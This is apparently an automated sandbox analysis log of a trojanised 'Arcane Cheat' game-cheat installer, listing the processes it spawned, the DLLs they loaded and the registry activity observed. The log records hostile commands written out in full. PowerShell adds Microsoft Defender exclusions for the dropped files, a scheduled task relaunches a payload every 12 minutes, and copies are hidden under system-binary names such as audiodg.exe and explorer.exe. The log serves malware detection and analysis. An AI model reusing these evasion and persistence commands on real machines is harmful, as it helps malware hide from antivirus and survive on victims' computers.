            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f
            Source: unknown Process created: C:\Windows\addins\audiodg.exe C:\Windows\addins\audiodg.exe
            Source: unknown Process created: C:\Windows\addins\audiodg.exe C:\Windows\addins\audiodg.exe
            Source: unknown Process created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown Process created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: version.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: slc.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: mscoree.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: apphelp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: version.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: uxtheme.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: windows.storage.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: wldp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: profapi.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptsp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: rsaenh.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptbase.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: sspicli.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: mscoree.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: version.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: uxtheme.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: windows.storage.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: wldp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: profapi.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptsp.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: rsaenh.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: cryptbase.dll
            Source: C:\Windows\addins\audiodg.exeSection loaded: sspicli.dll
            Source: C:\Recovery\explorer.exeSection loaded: mscoree.dll
            Source: C:\Recovery\explorer.exeSection loaded: apphelp.dll
            Source: C:\Recovery\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\explorer.exeSection loaded: version.dll
            Source: C:\Recovery\explorer.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\explorer.exeSection loaded: wldp.dll
            Source: C:\Recovery\explorer.exeSection loaded: profapi.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Recovery\explorer.exeSection loaded: mscoree.dll
            Source: C:\Recovery\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\explorer.exeSection loaded: version.dll
            Source: C:\Recovery\explorer.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\explorer.exeSection loaded: wldp.dll
            Source: C:\Recovery\explorer.exeSection loaded: profapi.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Window found: window name: TSelectLanguageForm
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Automated click: OK
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Automated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Automated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Automated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Automated click: Install
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp, Automated click: Next >
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, Directory created: C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe
